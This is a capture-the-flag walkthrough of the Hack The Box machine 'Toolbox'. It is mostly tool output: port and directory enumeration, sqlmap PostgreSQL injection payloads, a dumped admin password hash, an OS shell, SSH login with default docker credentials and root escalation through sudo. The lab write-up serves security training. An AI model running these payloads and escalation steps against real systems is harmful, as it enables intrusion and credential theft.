6 minutes
Toolbox
Enumeration
NMAP
Warning: 10.10.10.236 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.236
Host is up (0.076s latency).
Not shown: 57953 closed ports, 7569 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 64.86 seconds
Nmap scan report for 10.10.10.236
Host is up (0.11s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
| 256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_ 256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after: 2021-02-17T17:45:56
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -7s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-13T11:03:39
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.44 seconds
Gobuster
┌──(bob㉿kali)-[~/htb/toolbox]
└─$ gobuster dir -k -u https://megalogistic.com -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x html,txt,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://megalogistic.com
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,txt,bak
[+] Timeout: 10s
===============================================================
2021/04/13 07:22:55 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 323] [--> https://megalogistic.com/images/]
/js (Status: 301) [Size: 319] [--> https://megalogistic.com/js/]
/css (Status: 301) [Size: 320] [--> https://megalogistic.com/css/]
/contact.html (Status: 200) [Size: 10334]
/blog.html (Status: 200) [Size: 11609]
/about.html (Status: 200) [Size: 18491]
/services.html (Status: 200) [Size: 13264]
/index.html (Status: 200) [Size: 22357]
/fonts (Status: 301) [Size: 322] [--> https://megalogistic.com/fonts/]
/industries.html (Status: 200) [Size: 16188]
/server-status (Status: 403) [Size: 282]
─$ gobuster dir -k -u https://admin.megalogistic.com -w /opt/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://admin.megalogistic.com
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/04/13 07:51:39 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 889]
/license.txt (Status: 200) [Size: 1107]
/.htaccess (Status: 403) [Size: 288]
/style.css (Status: 200) [Size: 5186]
/. (Status: 200) [Size: 889]
/.html (Status: 403) [Size: 288]
/dashboard.php (Status: 302) [Size: 5862] [--> index.php]
/script.js (Status: 200) [Size: 4451]
/.htpasswd (Status: 403) [Size: 288]
/.htm (Status: 403) [Size: 288]
/.htpasswds (Status: 403) [Size: 288]
/.htgroup (Status: 403) [Size: 288]
/admin.css (Status: 200) [Size: 17057]
/.htaccess.bak (Status: 403) [Size: 288]
/.htuser (Status: 403) [Size: 288]
/.ht (Status: 403) [Size: 288]
/.htc (Status: 403) [Size: 288]
/.htacess (Status: 403) [Size: 288]
Subdomain enum
└─$ ffuf -u https://10.10.10.236 -w /opt/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.megalogistic.com" -fl 522
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : https://10.10.10.236
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.megalogistic.com
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response lines: 522
________________________________________________
admin [Status: 200, Size: 889, Words: 134, Lines: 36]
:: Progress: [100000/100000] :: Job [1/1] :: 217 req/sec :: Duration: [0:07:00] :: Errors: 0 ::
SQL Injection
First attempt Since we know from bypassing the login prompt that the DB is vulnerable to SQL injection, we continue poking at it with SQLmap.
sqlmap -r req.txt --batch --force-ssl
[...]
[*] starting @ 09:16:08 /2021-04-13/
[09:16:08] [INFO] parsing HTTP request from 'req.txt'
[09:16:08] [INFO] resuming back-end DBMS 'postgresql'
[09:16:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=-7486' OR 9670=9670-- iBIe&password=asd
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: username=asdf' AND 2433=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2433=2433) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(120)||CHR(106)||CHR(113)) AS NUMERIC)-- CBFU&password=asd
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=asdf';SELECT PG_SLEEP(5)--&password=asd
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=asdf' AND 3770=(SELECT 3770 FROM PG_SLEEP(5))-- UzvQ&password=asd
---
[09:16:09] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 10 (buster)
web application technology: PHP 7.3.14, Apache 2.4.38
back-end DBMS: PostgreSQL
[09:16:09] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[09:16:09] [INFO] fetching database (schema) names
[09:16:10] [INFO] retrieved: 'public'
[09:16:10] [INFO] retrieved: 'pg_catalog'
[09:16:11] [INFO] retrieved: 'information_schema'
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
From enumerating the tables, public seems interesting as it contains users
sqlmap -r req.txt --batch --force-ssl -D public --dump
[...]
back-end DBMS: PostgreSQL
[09:18:39] [INFO] fetching tables for database: 'public'
[09:18:39] [INFO] resumed: 'users'
[09:18:39] [INFO] fetching columns for table 'users' in database 'public'
[09:18:40] [INFO] retrieved: 'password'
[09:18:40] [INFO] retrieved: 'varchar'
[09:18:40] [INFO] retrieved: 'username'
[09:18:41] [INFO] retrieved: 'varchar'
[09:18:41] [INFO] fetching entries for table 'users' in database 'public'
[09:18:41] [INFO] retrieved: '4a100a85cb5ca3616dcf137918550815'
[09:18:42] [INFO] retrieved: 'admin'
[09:18:42] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[09:18:42] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:18:42] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[09:18:42] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:18:42] [INFO] starting 2 processes
[09:19:15] [WARNING] no clear password(s) found
Database: public
Table: users
[1 entry]
+----------------------------------+----------+
| password | username |
+----------------------------------+----------+
| 4a100a85cb5ca3616dcf137918550815 | admin |
+----------------------------------+----------+
[09:19:15] [INFO] table 'public.users' dumped to CSV file '/home/bob/.local/share/sqlmap/output/admin.megalogistic.com/dump/public/users.csv'
[09:19:15] [INFO] fetched data logged to text files under '/home/bob/.local/share/sqlmap/output/admin.megalogistic.com'
[*] ending @ 09:19:15 /2021-04-13/
We get command execution ..
└─$ sqlmap -r req.txt --force-ssl --os-shell
[...]
And land a shell
We get use find to find a potential user flag
find / -type f -name user.txt 2>/dev/null
</11/main$ find / -type f -name user.txt 2>/dev/null
/var/lib/postgresql/user.txt
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$
User flag down!
From deepce +] Kernel .................. 4.14.154-boot2docker.
From the documentation
We learn that there are a pair of default creds.
If we try this creds
tcuser@172.17.0.1: Permission denied (publickey,password,keyboard-interactive).
ssh docker@172.17.0.1
ssh docker@172.17.0.1
tcuser
( '>')
/) TC (\ Core is distributed with ABSOLUTELY NO WARRANTY.
(/-_--_-\) www.tinycorelinux.net
docker@box:~$
with sudo -l
User docker may run the following commands on this host:
(root) NOPASSWD: ALL
sudo bash -p
sudo bash -p
whoami
whoami
root
root@box:/home/docker#
Since this is running on Windows, we can get to the hosts file system at /c/.
docker@box:/c/Users/Administrator/Desktop$ ls
desktop.ini root.txt
Read other posts